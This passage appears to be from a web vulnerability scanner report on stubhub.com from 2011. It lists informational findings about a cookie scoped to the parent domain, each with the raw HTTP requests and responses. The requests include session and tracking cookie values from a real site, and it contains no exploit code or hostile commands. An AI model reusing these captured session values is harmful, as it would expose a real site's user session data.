STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cstub_sid%7E%5E%7E3186517046%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E804700%2C911274%7E%5E%7E06%2F19%2F2011; mbox=PC#1308447436655-203098.17#1345314947|check#true#1311100607|session#1311100546147-926694#1311102407; s_pers=%20s_nr%3D1311100550187-Repeat%7C1345228550187%3B%20currentCTC%3DC12289x970%7C1313692550208%3B%20s_cpm%3D%255B%255B'RF%25253A%252520burp'%252C'1308567426317'%255D%252C%255B'C12289x970'%252C'1311100550213'%255D%255D%7C1468953350213%3B%20currentCVP%3DRF%253A%2520burp%253EC12289x970%7C1313692550219%3B%20s_ev41%3D%255B%255B'6%252F20%252F2011%25252010%25253A57%252520AM'%252C'1308567426321'%255D%252C%255B'7%252F19%252F2011%2525206%25253A35%252520PM'%252C'1311100550224'%255D%255D%7C1468953350224%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=6923598397700396013; bn_recs=baynoteON; fsr.s={"cp":{"userid":"","pagetype":"Browse_event","url":"http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298","genre":"U2 Tickets","genreid":"602","event":"U2 with Interpol Tickets (Rescheduled from 7/19/2010)","eventid":"906484","genreparentid":"602","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$62.00'","fee":"","TT_variant":""},"v":1,"rid":"1311100555294_43119","ru":"http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669","r":"bing.fansnap.com","st":"","to":3,"c":"http://www.stubhub.com/","pv":1,"lc":{"d1":{"v":1,"s":false}},"cd":1,"sd":1}; TLTHID=EC632AD4B23510B2E9D1AE6611395988

<ClientEventSet PostTimeStamp="1311100582301" ><ClientEvent Count="1" Type="PERFORMANCE" SubType="INIT" TimeDuration="6032" DateSince1970="1311100552237" PageId="ID13H35M46S205R0.5240641888231039" >

...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:37:55 GMT
Server: Apache
Set-Cookie: TLTHID=379551A8B23610B2DCD699373A2BF429; Path=/; Domain=.stubhub.com
Last-Modified: Tue, 16 Feb 2010 20:48:57 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 180
Content-Type: text/html

<html>
<head>
<meta HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
<title id=titletext>OK</title>
</head>
<body bgcolor=white>
</body>

</html>

13.142. http://www.stubhub.com/assets/default.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stubhub.com
Path:	/assets/default.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=E551BC2EB23510B2DFDBC89D01B99543; Path=/; Domain=.stubhub.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/default.css HTTP/1.1
Host: www.stubhub.com
Proxy-Connection: keep-alive
Referer: http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FEA96A851D3BE6-40000130201078BD[CE]; mbox=PC#1308447436655-203098.17#1342781785|check#true#1308567445|session#1308567384165-120206#1308569245; s_pers=%20s_nr%3D1308567426309-Repeat%7C1342695426309%3B%20currentCTC%3DRF%253A%2520burp%7C1311159426314%3B%20s_cpm%3D%255B%255B'RF%25253A%252520burp'%252C'1308567426317'%255D%255D%7C1466420226317%3B%20currentCVP%3DRF%253A%2520burp%7C1311159426319%3B%20s_ev41%3D%255B%255B'6%252F20%252F2011%25252010%25253A57%252520AM'%252C'1308567426321'%255D%255D%7C1466420226321%3B; bn_u=6923598397700396013; bn_recs=baynoteOFF; TLTHID=E493C48AB23510B20181E6948C34E401; TLTSID=E493C48AB23510B20181E6948C34E401; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cguid%7E%5E%7EA86F8230C30A02F2E0440021286899D6%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cstub_sid%7E%5E%7E3186517046%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E804700%2C911274%7E%5E%7E06%2F19%2F2011

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:37 GMT
Server: Apache
Set-Cookie: TLTHID=E551BC2EB23510B2DFDBC89D01B99543; Path=/; Domain=.stubhub.com
Last-Modified: Tue, 02 Feb 2010 04:41:07 GMT
Accept-Ranges: bytes
Cache-Control: max-age=1800
Expires: Tue, 19 Jul 2011 19:05:37 GMT
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/css

13.143. http://www.stubhub.com/content/getPromoContent previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stubhub.com
Path:	/content/getPromoContent

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=01333828B23610B20B11F351420A2498; Path=/; Domain=.stubhub.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /content/getPromoContent HTTP/1.1
Host: www.stubhub.com
Proxy-Connection: keep-alive
Referer: http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298
Content-Length: 27
Origin: http://www.stubhub.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Content-Type: application/x-www-form-urlencoded
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FEA96A851D3BE6-40000130201078BD[CE]; s_pers=%20s_nr%3D1308567426309-Repeat%7C1342695426309%3B%20currentCTC%3DRF%253A%2520burp%7C1311159426314%3B%20s_cpm%3D%255B%255B'RF%25253A%252520burp'%252C'1308567426317'%255D%255D%7C1466420226317%3B%20currentCVP%3DRF%253A%2520burp%7C1311159426319%3B%20s_ev41%3D%255B%255B'6%252F20%252F2011%25252010%25253A57%252520AM'%252C'1308567426321'%255D%255D%7C1466420226321%3B; bn_u=6923598397700396013; bn_recs=baynoteOFF; TLTSID=E493C48AB23510B20181E6948C34E401; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cguid%7E%5E%7EA86F8230C30A02F2E0440021286899D6%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cstub_sid%7E%5E%7E3186517046%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E804700%2C911274%7E%5E%7E06%2F19%2F2011; mbox=PC#1308447436655-203098.17#1345314947|check#true#1311100607|session#1311100546147-926694#1311102407; TLTHID=E6BAADE6B23510B2DB31CE1C46E5CCE3; fsr.a=1311100549160; fsr.s={"cp":{"userid":"","pagetype":"Browse_event","url":"http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298","genre":"U2 Tickets","genreid":"602","event":"U2 with Interpol Tickets (Rescheduled from 7/19/2010)","eventid":"906484","genreparentid":"602","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$62.00'","fee":"","TT_variant":""}}; s_sess=%20s_cc%3Dtrue%3B

pageType=BrowseTicketDetail

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:23 GMT
Server: Apache
Set-Cookie: TLTHID=01333828B23610B20B11F351420A2498; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: 572c#f98b1/getPromoContent@srwp01brs006.stubprod.com
com-stubhub-dye: 572c#f98b1/getPromoContent@srwp01brs006.stubprod.com
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 71

<?xml version="1.0" encoding="UTF-8"?><blocks>No Promo Content</blocks>

13.144. http://www.stubhub.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stubhub.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=02B35B92B23610B2CDDBD1ECACF16CE8; Path=/; Domain=.stubhub.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.stubhub.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FEA96A851D3BE6-40000130201078BD[CE]; bn_recs=baynoteOFF; TLTSID=E493C48AB23510B20181E6948C34E401; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cguid%7E%5E%7EA86F8230C30A02F2E0440021286899D6%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cstub_sid%7E%5E%7E3186517046%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E804700%2C911274%7E%5E%7E06%2F19%2F2011; mbox=PC#1308447436655-203098.17#1345314947|check#true#1311100607|session#1311100546147-926694#1311102407; fsr.s={"cp":{"userid":"","pagetype":"Browse_event","url":"http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298","genre":"U2 Tickets","genreid":"602","event":"U2 with Interpol Tickets (Rescheduled from 7/19/2010)","eventid":"906484","genreparentid":"602","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$62.00'","fee":"","TT_variant":""}}; TLTHID=E8A4044AB23510B2043FC687D11520A8; s_pers=%20s_nr%3D1311100550187-Repeat%7C1345228550187%3B%20currentCTC%3DC12289x970%7C1313692550208%3B%20s_cpm%3D%255B%255B'RF%25253A%252520burp'%252C'1308567426317'%255D%252C%255B'C12289x970'%252C'1311100550213'%255D%255D%7C1468953350213%3B%20currentCVP%3DRF%253A%2520burp%253EC12289x970%7C1313692550219%3B%20s_ev41%3D%255B%255B'6%252F20%252F2011%25252010%25253A57%252520AM'%252C'1308567426321'%255D%252C%255B'7%252F19%252F2011%2525206%25253A35%252520PM'%252C'1311100550224'%255D%255D%7C1468953350224%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.a=1311100552198; bn_u=6923598397700396013

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:26 GMT
Server: Apache
Set-Cookie: TLTHID=02B35B92B23610B2CDDBD1ECACF16CE8; Path=/; Domain=.stubhub.com
Last-Modified: Thu, 23 Mar 2006 01:37:46 GMT
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: text/plain

..............h.......(....... ........................................V...............3...33..3f..3...3...3...f...f3..ff..f...f...f........3...f...................3...f...................3...f.......
...[SNIP]...

13.145. http://www.stubhub.com/promotions/scratch/foresee_v1/foresee-dhtml-popup.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stubhub.com
Path:	/promotions/scratch/foresee_v1/foresee-dhtml-popup.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=EC632AD4B23510B2E9D1AE6611395988; Path=/; Domain=.stubhub.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promotions/scratch/foresee_v1/foresee-dhtml-popup.js HTTP/1.1
Host: www.stubhub.com
Proxy-Connection: keep-alive
Referer: http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FEA96A851D3BE6-40000130201078BD[CE]; TLTSID=E493C48AB23510B20181E6948C34E401; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cguid%7E%5E%7EA86F8230C30A02F2E0440021286899D6%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cstub_sid%7E%5E%7E3186517046%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E804700%2C911274%7E%5E%7E06%2F19%2F2011; mbox=PC#1308447436655-203098.17#1345314947|check#true#1311100607|session#1311100546147-926694#1311102407; s_pers=%20s_nr%3D1311100550187-Repeat%7C1345228550187%3B%20currentCTC%3DC12289x970%7C1313692550208%3B%20s_cpm%3D%255B%255B'RF%25253A%252520burp'%252C'1308567426317'%255D%252C%255B'C12289x970'%252C'1311100550213'%255D%255D%7C1468953350213%3B%20currentCVP%3DRF%253A%2520burp%253EC12289x970%7C1313692550219%3B%20s_ev41%3D%255B%255B'6%252F20%252F2011%25252010%25253A57%252520AM'%252C'1308567426321'%255D%252C%255B'7%252F19%252F2011%2525206%25253A35%252520PM'%252C'1311100550224'%255D%255D%7C1468953350224%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=6923598397700396013; bn_recs=baynoteON; TLTHID=EB2903FAB23510B2F895E17C95DDB51E; fsr.s={"cp":{"userid":"","pagetype":"Browse_event","url":"http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298","genre":"U2 Tickets","genreid":"602","event":"U2 with Interpol Tickets (Rescheduled from 7/19/2010)","eventid":"906484","genreparentid":"602","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$62.00'","fee":"","TT_variant":""},"v":1,"rid":"1311100555294_43119"}

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:49 GMT
Server: Apache
Set-Cookie: TLTHID=EC632AD4B23510B2E9D1AE6611395988; Path=/; Domain=.stubhub.com
Last-Modified: Fri, 24 Jun 2011 01:19:36 GMT
Accept-Ranges: bytes
Cache-Control: max-age=1800
Expires: Tue, 19 Jul 2011 19:05:49 GMT
Vary: Accept-Encoding
Content-Length: 21520
Content-Type: text/javascript

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
FSR.Element.fsr$implement({fsr$getScrolls:function(){var B=this,A={x:0,y:0};while(B&&!FSR.isBody(B)){A.x+=B.scrollLeft;
A.y+=B.s
...[SNIP]...

13.146. http://www.stubhub.com/promotions/scratch/foresee_v1/foresee-dhtml.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stubhub.com
Path:	/promotions/scratch/foresee_v1/foresee-dhtml.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=EC5CA25EB23510B2D4AA9F0FE0F99B10; Path=/; Domain=.stubhub.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promotions/scratch/foresee_v1/foresee-dhtml.css HTTP/1.1
Host: www.stubhub.com
Proxy-Connection: keep-alive
Referer: http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FEA96A851D3BE6-40000130201078BD[CE]; TLTSID=E493C48AB23510B20181E6948C34E401; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cguid%7E%5E%7EA86F8230C30A02F2E0440021286899D6%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cstub_sid%7E%5E%7E3186517046%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E804700%2C911274%7E%5E%7E06%2F19%2F2011; mbox=PC#1308447436655-203098.17#1345314947|check#true#1311100607|session#1311100546147-926694#1311102407; 